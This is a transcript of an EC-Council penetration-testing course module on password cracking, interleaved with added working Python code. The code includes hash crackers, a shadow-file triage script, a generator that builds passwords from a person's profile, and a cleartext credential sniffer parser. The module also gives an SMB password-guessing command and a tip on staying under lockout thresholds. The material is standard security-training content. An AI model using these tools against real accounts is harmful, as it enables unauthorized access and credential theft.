LPTv4 Module 25 Password Cracking Penetration Testing_NoRestriction
Transcript of LPTv4 Module 25 Password Cracking Penetration Testing_NoRestriction
ECSA/LPT
EC-Council Module XXV
Password Cracking Penetration Testing
Penetration Testing Roadmap
Start Here
Information Gathering
Vulnerability Analysis
External Penetration Testing
Firewall Penetration Testing
Router and Switches Penetration Testing
Internal Network Penetration Testing
IDS Penetration Testing
Wireless Network Penetration Testing
Denial of Service Penetration Testing
Password Cracking Penetration Testing
Stolen Laptop, PDAs and Cell Phones Penetration Testing
Social Engineering Penetration Testing
Application Penetration Testing
Cont'd
EC-Council Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Penetration Testing Roadmap (cont'd)
Physical Security Penetration Testing
Database Penetration Testing
VoIP Penetration Testing
Virus and Trojan Detection
War Dialing
VPN Penetration Testing
Log Management Penetration Testing
File Integrity Checking
Bluetooth and Handheld Device Penetration Testing
Telecommunication and Broadband Communication Penetration Testing
Email Security Penetration Testing
Security Patches Penetration Testing
Data Leakage Penetration Testing
End Here
Passwords
Companies protect their resources by using combinations of user IDs and passwords.
Hackers can brute force or guess the passwords of web applications.
Some system software products use weak or no encryption to store and/or transmit their user IDs and passwords from the client to the server.
One of the leading causes of network compromises is the use of easily guessable or decipherable passwords.
Common Password Vulnerabilities
Weak passwords are:
• Easily guessable, i.e., pet names, car number, family member's name, etc.
• Comprised of common vocabulary words.
Improper handling of strong passwords:
• Involves the need for the user to write down the password in an insecure location.
Password Cracking Techniques
Social engineering:
• Guessing
• Shoulder surfing
Using password crackers or network analyzers
Types of Password Cracking Attacks
Dictionary attack: This attack compares a set of words against a password database.
Brute-force attack: This attack checks all combinations of letters and numbers until the password is found.
Hybrid attack: This attack cracks passwords by adding numbers and symbols to the words in a dictionary file.
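The three attack types, as an added worked example that is not part of the EC-Council slides. The wordlist, the target passwords and the hash function (unsalted SHA-256, chosen so the block runs offline) are constructed for the example; a real target's hash function is plugged in through hash_fn and the same loops apply. keyspace() shows why brute force is the last resort: the candidate count grows as charset_size ** length.

```python
"""Dictionary, brute-force and hybrid attacks against a password hash.
Added example (not course material): unsalted SHA-256 stands in for the
target system's hash, and the wordlist and secrets are constructed."""
import hashlib
import itertools
from typing import Callable, Iterable, Iterator, Optional

HashFn = Callable[[str], str]


def sha256_hex(candidate: str) -> str:
    """Stand-in hash; swap in the target's real algorithm via hash_fn."""
    return hashlib.sha256(candidate.encode("utf-8")).hexdigest()


def dictionary_attack(target: str, words: Iterable[str],
                      hash_fn: HashFn = sha256_hex) -> Optional[str]:
    """Hash each candidate word and compare; returns the match or None."""
    for word in words:
        if hash_fn(word) == target:
            return word
    return None


def keyspace(charset: str, max_len: int) -> int:
    """Candidates brute force must try for every length from 1 to max_len."""
    return sum(len(charset) ** n for n in range(1, max_len + 1))


def brute_force_attack(target: str, charset: str, max_len: int,
                       hash_fn: HashFn = sha256_hex) -> Optional[str]:
    """Try every string over charset, shortest first."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hash_fn(candidate) == target:
                return candidate
    return None


def hybrid_candidates(words: Iterable[str], max_digits: int = 2,
                      symbols: str = "!@#$") -> Iterator[str]:
    """Dictionary words with case variants and digit/symbol suffixes appended."""
    for word in words:
        for base in dict.fromkeys((word, word.lower(), word.capitalize(), word.upper())):
            yield base
            for n in range(10 ** max_digits):
                yield f"{base}{n}"
            for sym in symbols:
                yield f"{base}{sym}"


def hybrid_attack(target: str, words: Iterable[str],
                  hash_fn: HashFn = sha256_hex) -> Optional[str]:
    """A dictionary attack run over the mangled candidates."""
    return dictionary_attack(target, hybrid_candidates(words), hash_fn)


# Constructed mini wordlist for the demonstration.
WORDS = ["password", "sunshine", "letmein", "dragon"]

if __name__ == "__main__":
    for secret in ("letmein", "Sunshine7", "z9q"):
        target = sha256_hex(secret)
        print(f"{secret:10} dictionary={dictionary_attack(target, WORDS)!r:12} "
              f"hybrid={hybrid_attack(target, WORDS)!r}")
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    print("brute-force keyspace up to 3 chars:", keyspace(charset, 3))
    print("brute force:", brute_force_attack(sha256_hex("z9q"), charset, 3))
```

"letmein" falls to the plain dictionary, "Sunshine7" only to the hybrid rules, and "z9q" to neither, so it is left for brute force over 36 characters up to length 3 (46,656 candidates at that length alone).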
Steps in Password Cracking Penetration Testing
Extract /etc/passwd and /etc/shadow files in Linux systems
Extract SAM file from Windows machines
Identify the target person's personal profile
Build a dictionary of word lists
Attempt to guess passwords
Brute force passwords
Use automated password crackers to break password protected files
Step 1: Extract /etc/passwd and /etc/shadow Files in Linux Systems
The password file for Linux is located in /etc and is a text file called passwd.
By default and design, this file is world readable by anyone on the system.
On a Unix system using NIS/yp or password shadowing the password data may be located elsewhere. This "shadow" file is usually where the password hashes themselves are located.
root:!:0:0:root:/root:/bin/tcsh
bin:!:1:1:bin:/bin:
daemon:!:2:2:daemon:/sbin:
adm:!:3:4:adm:/var/adm:
lp:!:4:7:lp:/var/spool/lpd:
sync:!:5:0:sync:/sbin:/bin/sync
shutdown:!:6:0:shutdown:/sbin:/sbin/shutdown
halt:!:7:0:halt:/sbin:/sbin/halt
mail:!:8:12:mail:/var/spool/mail:
news:!:9:13:INN (NNTP Server) Admin ID, 525-2525:/usr/local/lib/inn:/bin/ksh
uucp:!:10:14:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
operator:!:0:0:operator:/root:/bin/tcsh
games:!:12:100:games:/usr/games:
man:!:13:15:man:/usr/man:
postmaster:!:14:12:postmaster:/var/spool/mail:/bin/tcsh
httpd:!:15:30:httpd:/usr/sbin:/usr/sbin/httpd:
nobody:!:65535:100:nobody:/dev/null:
ftp:!:404:100::/home/ftp:/bin/nologin
nomad:!:501:100:Simple Nomad, 525-5252:/home/nomad:/bin/bash
webadmin:!:502:100:Web Admin Group ID:/home/webadmin:/bin/bash
thegnome:!:503:100:Simple Nomad's Old Account:/home/thegnome:/bin/tcsh
dorkus:!:504:100:Alternate account for Fred:/home/dorkus:/bin/tcsh
Linux Password Example
nomad:HrLNrZ3VS3TF2:501:100:Simple Nomad:/home/nomad:/bin/bash
This is what the fields actually are:
• nomad: Account or user name, what you type in at the login prompt
• HrLNrZ3VS3TF2: One-way encrypted password (plus any aging info)
• 501: User number
• 100: Group number
• Simple Nomad: GECOS information
• /home/nomad: Home directory
• /bin/bash: Program to run on login, usually a shell
Linux Shadow File Example
nomad:$1$fnffc$GteyHdicpGOfffXX40w#5:13064:0:99999:7
This is what the fields actually are:
• nomad: Account or user name, what you type in at the login prompt
• $1$fnffc$GteyHdicpGOfffXX40w#5: Password hash
• 13064: Date of last password change (days since 1 January 1970)
• 0: Minimum number of days required between password changes
• 99999: Maximum number of days the password is valid
• 7: The number of days the user is warned before the password expires
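The two record formats above, parsed and recombined the way John the Ripper's unshadow does, then triaged before anything is fed to a cracker. This is an added example rather than course material: the sample passwd and shadow records are constructed, and the hash strings in them only have the prefix shape of real md5crypt/sha256crypt/sha512crypt/DES hashes, they are not hashes of anything. The point the slide does not make is in classify_hash: a '!' prefix from usermod -L locks the account but leaves the hash in place, so "locked" accounts are still worth cracking for password reuse.

```python
"""Parse /etc/passwd and /etc/shadow, merge them like John the Ripper's
`unshadow`, and triage the hashes before cracking. Added example, not
course material; every record below is constructed and the hash strings
only imitate the shape of real ones."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nomad:x:501:100:Simple Nomad:/home/nomad:/bin/bash
legacy:HrLNrZ3VS3TF2:502:100:DES hash left in passwd:/home/legacy:/bin/sh
svc:x:503:100:service account:/var/lib/svc:/usr/sbin/nologin
"""
# Modern 9-field lines plus one old 6-field line like the slide's example.
SHADOW_SAMPLE = """\
root:$6$Q9xk2Lm1$0b7UjVq3Z8n4yTfW1cRkPd2sGhA5eX6LmN7oB8qC9rD0sE1tF2uG3vH4wI5:19000:0:99999:7:::
daemon:*:18000:0:99999:7:::
nomad:$1$fnffc$GteyHdicpGOfffXX40w5:13064:0:99999:7
svc:!$5$saltsalt$Q7pK2mN9rT4vX1yB6cD8eF0gH3jL5nP7sU9wZ2aC4e:18500:0:99999:7:::
"""

@dataclass
class PasswdEntry:
    name: str
    passwd: str  # "x" means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

@dataclass
class ShadowEntry:
    name: str
    hash: str
    last_change: Optional[int]  # days since 1970-01-01
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]
    inactive_days: Optional[int]
    expire_day: Optional[int]

def _opt_int(field: str) -> Optional[int]:
    return int(field) if field.strip() else None

def parse_passwd(text: str) -> Dict[str, PasswdEntry]:
    entries: Dict[str, PasswdEntry] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        entries[f[0]] = PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6])
    return entries

def parse_shadow(text: str) -> Dict[str, ShadowEntry]:
    """Accepts both the 9-field layout and the older 6-field one."""
    entries: Dict[str, ShadowEntry] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) < 6:
            raise ValueError(f"malformed shadow line: {line!r}")
        f += [""] * (9 - len(f))  # pad short (old-style) lines
        entries[f[0]] = ShadowEntry(f[0], f[1], *(_opt_int(x) for x in f[2:8]))
    return entries

HASH_PREFIXES = {"$1$": "md5crypt (fast, weak)", "$2a$": "bcrypt", "$2b$": "bcrypt",
                 "$2y$": "bcrypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$7$": "scrypt", "$y$": "yescrypt"}

def classify_hash(h: str) -> str:
    """Label the password field so you know what to feed the cracker."""
    if h == "":
        return "empty (login needs no password)"
    if h == "x":
        return "shadowed (see /etc/shadow)"
    if h in ("*", "!", "!!"):
        return "locked, no hash"
    if h.startswith("!"):
        # usermod -L / passwd -l only prefix '!': locked, but the hash survives
        return "locked, hash still present: " + classify_hash(h.lstrip("!"))
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    if len(h) == 13 and "$" not in h:
        return "traditional DES crypt (8-char limit, weak)"
    return "unknown"

def is_crackable(h: str) -> bool:
    """True when the field holds a real hash, locked or not."""
    return h.lstrip("!") not in ("", "*", "x") and classify_hash(h) != "unknown"

def unshadow(passwd: Dict[str, PasswdEntry], shadow: Dict[str, ShadowEntry]) -> List[str]:
    """passwd lines with the shadow hash put back into field 2."""
    lines = []
    for name, p in passwd.items():
        h = shadow[name].hash if p.passwd == "x" and name in shadow else p.passwd
        lines.append(":".join([name, h, str(p.uid), str(p.gid), p.gecos, p.home, p.shell]))
    return lines

def crackable(passwd: Dict[str, PasswdEntry], shadow: Dict[str, ShadowEntry]) -> List[str]:
    return [l.split(":")[0] for l in unshadow(passwd, shadow) if is_crackable(l.split(":")[1])]

def last_change_date(entry: ShadowEntry) -> Optional[date]:
    """Field 3 is days since the epoch; turn it into a calendar date."""
    return None if entry.last_change is None else date(1970, 1, 1) + timedelta(days=entry.last_change)

if __name__ == "__main__":
    pw, sh = parse_passwd(PASSWD_SAMPLE), parse_shadow(SHADOW_SAMPLE)
    for line in unshadow(pw, sh):
        name, h = line.split(":")[:2]
        changed = last_change_date(sh[name]) if name in sh else "n/a"
        print(f"{name:8} {classify_hash(h):45} last change {changed}")
    print("worth cracking:", crackable(pw, sh))
```

Run against the sample, daemon (an asterisk, no hash) drops out, while root, nomad, the DES hash left directly in passwd, and the "locked" svc account all stay on the cracking list.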
Check Other Linux & UNIX Variants
Passwords can also be stored in these files:
• /etc/security/passwd (accessible by root only)
• /.secure/etc/passwd (accessible by root only)
Step 2: Extract SAM File from Windows Machines
Windows 2000/XP passwords are stored in c:\winnt\system32\config\SAM (c:\windows\system32\config\SAM on XP).
The file is named SAM and is locked while Windows is running.
Extraction tools:
• SAMDUMP
• PWDUMP
• L0phtcrack
Extract Backup of SAM/Emergency Repair Disk
Windows also stores a backup copy of the SAM file in the c:\winnt\repair directory or on an emergency repair disk; these copies are not locked.
Check Registry
Windows applications store passwords in the Registry or as plaintext files on the hard drive.
Check Microsoft's Server Message Block (SMB) Protocol
Check for vulnerabilities in the SMB protocol that is used for file and print sharing.
Run the NetBIOS Auditing Tool (NAT) to guess passwords against the target's shares with the following command:
nat -u userlist.txt -p passlist.txt IP_address
Check the Active Directory Database
Check for password hashes in the Active Directory database file (ntds.dit) that is stored locally on, and replicated across, the domain controllers.
Step 3: Identify the Target Person's Personal Profile
If you are trying to guess Rebecca's password on her desktop, then compile a list of items she likes.
Example:
• Favorite car
• Birthday, anniversary day, and other special occasions
• Movies, music, sports, drama, and arts
• Education, cartoon characters, novelists
• Parents, relatives, kids' names
• Country, city, holiday resorts, etc.
• Project working on
Step 4: Build a Dictionary of Word Lists
Build a word list based on the information from the previous slide.
Tools:
• Dictionary Maker
• Pass list
Step 5: Attempt to Guess Passwords
Obtaining a legitimate user ID is not an easy task.
Creation of a user ID usually involves a variation of the employee's first name and last name.
Email addresses posted on the organization's website show the user ID format in use.
Acquiring a copy of the organization's internal telephone directory helps in discovering and constructing valid user IDs.
Many system software products are initially configured with default user IDs and passwords.
These default user IDs and passwords are designed to enable vendors to perform remote transactions.
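Steps 3 to 5 carried through in code, as an added example that is not part of the course: a constructed profile of a fictional "Rebecca Jones" is turned into user-ID guesses in the name-based formats described above and into a mangled password word list. The profile values, the suffix rules (birth year, anniversary, two- and four-digit years, 1, 123, !) and the 1980 to 2010 year range are assumptions chosen for the example; tune them from what Step 3 actually turns up.

```python
"""Turn a target's personal profile into user-ID guesses and a password
word list (Steps 3 to 5). Added example, not course material; the
profile is constructed and describes no real person."""
import itertools
from typing import Dict, Iterable, List, Set

# Constructed profile (assumption for the example).
PROFILE: Dict[str, str] = {
    "first": "Rebecca", "last": "Jones", "pet": "Milo", "car": "Mustang",
    "team": "Cowboys", "birth_year": "1985", "anniversary": "0612",
}

# Common character substitutions users make to "strengthen" a word.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def userid_candidates(first: str, last: str) -> List[str]:
    """Corporate user-ID formats derived from a person's name."""
    f, l = first.lower(), last.lower()
    forms = {f"{f}.{l}", f"{f}{l}", f"{f[0]}{l}", f"{f}{l[0]}", f"{l}{f[0]}",
             f"{f}_{l}", f"{l}.{f}", f}
    return sorted(forms)


def mangle(word: str) -> Set[str]:
    """Case and leet variants of one base word."""
    return {word, word.lower(), word.capitalize(), word.upper(),
            word.lower().translate(LEET)}


def build_wordlist(profile: Dict[str, str], years: Iterable[int] = range(1980, 2011),
                   max_combo: int = 2) -> List[str]:
    """Join up to max_combo profile words, mangle them, then append the
    numbers people tend to add: profile dates, years, 1, 123, !."""
    words = [v for v in profile.values() if not v.isdigit()]
    numbers = [v for v in profile.values() if v.isdigit()]
    year_strs = [str(y) for y in years]
    suffixes = [""] + numbers + year_strs + [y[2:] for y in year_strs] + ["1", "123", "!", "!1"]
    out: Set[str] = set()
    for n in range(1, max_combo + 1):
        for combo in itertools.permutations(words, n):
            for variant in mangle("".join(combo)):
                for suffix in suffixes:
                    out.add(variant + suffix)
    return sorted(out)


if __name__ == "__main__":
    print("user IDs:", userid_candidates(PROFILE["first"], PROFILE["last"]))
    wordlist = build_wordlist(PROFILE)
    print(len(wordlist), "password candidates, e.g.",
          [w for w in wordlist if w.startswith("Milo")][:6])
```

The output is a few thousand candidates, small enough to try against a web login or SMB share without tripping lockout thresholds if throttled, and far cheaper than the brute-force keyspace for the same lengths.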
Step 6: Brute Force Passwords
Run a dictionary attack and brute force to crack passwords.
Tools:
• Brutus
• L0phtcrack
• Munga Bunga
• Password Cracker
Step 6: Brute Force Passwords (cont'd)
Resources:
• www.antifork.org
• www.bindview.com
• www.cerberus-infosec.co.uk
• www.hackersclub.com
• www.hoobie.net
• www.intrusion.com
• www.nai.com
• www.nmrc.org
• http://packetstorm.decepticons.org
• www.phenoelit.de
• www.securitysoftwaretech.com
• www.users.dircon.co.uk/~crypto
• www.waveset.com
• ftp://ftp.cerias.purdue.edu/pub/dict
• ftp://ftp.ox.ac.uk/pub/wordlists
• packetstormsecurity.nl/Crackers/wordlists
• http://www.outpost9.com/files/WordLists.html
Step 7: Use Automated Password Crackers to Break Password Protected Files
Automated password cracking tools systematically guess passwords.
Tools:
• Brutus (www.hoobie.net)
• Cerberus Internet Scanner (www.cerberus-infosec.co.uk)
• Crack (www.users.dircon.co.uk/~crypto)
• CyberCop Scanner (www.nai.com)
• Inactive Account Scanner (www.waveset.com)
• Legion and NetBIOS Auditing Tool (NAT) (www.hackersclub.com)
• L0phtcrack (www.securitysoftwaretech.com)
• John the Ripper, SAMDump, PWDump, PWDump2, PWDump3 (www.nmrc.org)
• SecurityAnalyst (www.intrusion.com)
• TeeNet (www.phenoelit.de)
• WebCrack (www.packetstorm.decepticons.org)
Extract Cleartext Passwords from the Registry
Logon passwords (for example the DefaultPassword value used for automatic logon) can be stored in cleartext under:
• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Extract Cleartext Passwords from an Encrypted LM Hash
Use the Cain and Abel tool to recover the cleartext password from an LM hash.
Sniff Cleartext Passwords from the Wire
FTP, HTTP, POP3, SMTP, and IMAP send passwords as cleartext.
Run a sniffer to capture them.
Tool:
• dsniff
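What dsniff does for these five protocols, as an added example that is not part of the course: given a reassembled session, pull the credential out of each protocol's cleartext login exchange. The session transcripts and the accounts in them are constructed; the parser handles FTP and POP3 USER/PASS pairs, HTTP Basic (base64 of user:password), IMAP LOGIN with quoted arguments, and SMTP AUTH PLAIN with the credential on the same line. Capturing the traffic itself (tcpdump, dsniff) is outside the block.

```python
"""Pull credentials out of cleartext login exchanges the way dsniff does.
Added example, not course material; the session transcripts below are
constructed and the accounts in them are fictional."""
import base64
import binascii
import re
import shlex
from typing import Callable, Dict, List, Tuple

Credential = Tuple[str, str, str]  # (protocol, username, password)


def _user_pass_pairs(lines: List[str], proto: str) -> List[Credential]:
    """FTP and POP3 both send 'USER x' followed by 'PASS y' in the clear."""
    creds: List[Credential] = []
    user = None
    for line in lines:
        m = re.match(r"^(USER|PASS)\s+(.*)$", line, re.I)
        if not m:
            continue
        verb, arg = m.group(1).upper(), m.group(2).strip()
        if verb == "USER":
            user = arg
        elif user is not None:  # PASS without a preceding USER is ignored
            creds.append((proto, user, arg))
            user = None
    return creds


def _http_basic(lines: List[str]) -> List[Credential]:
    """Authorization: Basic is just base64(user:password)."""
    creds: List[Credential] = []
    for line in lines:
        m = re.match(r"^Authorization:\s*Basic\s+(\S+)", line, re.I)
        if not m:
            continue
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64, so not a credential
        user, sep, password = decoded.partition(":")
        if sep:
            creds.append(("HTTP", user, password))
    return creds


def _imap_login(lines: List[str]) -> List[Credential]:
    """'<tag> LOGIN user pass', where either argument may be quoted."""
    creds: List[Credential] = []
    for line in lines:
        try:
            tokens = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes
        if len(tokens) >= 4 and tokens[1].upper() == "LOGIN":
            creds.append(("IMAP", tokens[2], tokens[3]))
    return creds


def _smtp_auth_plain(lines: List[str]) -> List[Credential]:
    """AUTH PLAIN carries base64(authzid NUL authcid NUL password)."""
    creds: List[Credential] = []
    for line in lines:
        m = re.match(r"^AUTH\s+PLAIN\s+(\S+)", line, re.I)
        if not m:
            continue
        try:
            parts = base64.b64decode(m.group(1), validate=True).split(b"\0")
        except (binascii.Error, ValueError):
            continue
        if len(parts) == 3:
            creds.append(("SMTP", parts[1].decode("utf-8", "replace"),
                          parts[2].decode("utf-8", "replace")))
    return creds


EXTRACTORS: Dict[str, Callable[[List[str]], List[Credential]]] = {
    "FTP": lambda lines: _user_pass_pairs(lines, "FTP"),
    "POP3": lambda lines: _user_pass_pairs(lines, "POP3"),
    "HTTP": _http_basic,
    "IMAP": _imap_login,
    "SMTP": _smtp_auth_plain,
}


def harvest(protocol: str, payload: str) -> List[Credential]:
    """Run the right extractor over one reassembled session transcript."""
    return EXTRACTORS[protocol](payload.replace("\r\n", "\n").split("\n"))


# Constructed session transcripts, one per protocol.
SAMPLE_SESSIONS: List[Tuple[str, str]] = [
    ("FTP", "USER alice\r\n331 Password required\r\nPASS s3cret!\r\n230 Logged in\r\n"),
    ("POP3", "USER bob\r\n+OK\r\nPASS hunter2\r\n+OK\r\n"),
    ("HTTP", "GET /admin HTTP/1.1\r\nHost: intranet.example\r\nAuthorization: Basic "
             + base64.b64encode(b"carol:Winter2008").decode() + "\r\n\r\n"),
    ("IMAP", 'a001 LOGIN dave "pass word"\r\n'),
    ("SMTP", "AUTH PLAIN " + base64.b64encode(b"\0erin\0letmein").decode() + "\r\n"),
]


def harvest_all(sessions: List[Tuple[str, str]] = SAMPLE_SESSIONS) -> List[Credential]:
    return [c for proto, payload in sessions for c in harvest(proto, payload)]


if __name__ == "__main__":
    for proto, user, password in harvest_all():
        print(f"{proto:5} {user}:{password}")
```

Base64 is an encoding, not encryption, so the HTTP and SMTP forms are every bit as exposed as the FTP and POP3 ones; only TLS (FTPS, HTTPS, POP3S, IMAPS, STARTTLS) takes these off the wire.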
Replay Attack to Crack Password
A replay attack intercepts the data packets and resends them to the receiving server without decrypting them.
Intercept the communication using a network analyzer or sniffer such as Ethereal, tcpdump, or WinDump.
Tool: SAMInside 2.5.8.0 (pwdump)
Extracts Windows NT/2000/XP/2003 user names and passwords in national symbol encoding.
SAMInside 2.5.8.0 (pwdump): Screenshot
Tool: Dictionary Maker
Dictionary Maker is a tool to compose dictionaries (word lists) for password recovery using multiple source text files.
Tool: Password List Recovery 2.6
Password List Recovery shows all the passwords in the current Windows user's Password List (PWL) file.
PWL files are kept in the Windows directory and have a .PWL extension.
Password List Recovery 2.6: Screenshot
Summary
Passwords protect computer resources and files from unauthorized access by malicious users.
A combination of passwords and user IDs is used by companies to protect their resources against intrusion by hackers and thieves.
The password file for Linux is located in /etc and is a text file called passwd.
By default and design, the passwd file is world readable by anyone on the system, so on its own it does little to raise the level of protection against the system's own users.
SAMDUMP is a tool that dumps the password hashes from a Windows SAM file.
A word list needs to be built from the information gathered in the previous steps in order to break the victim's password.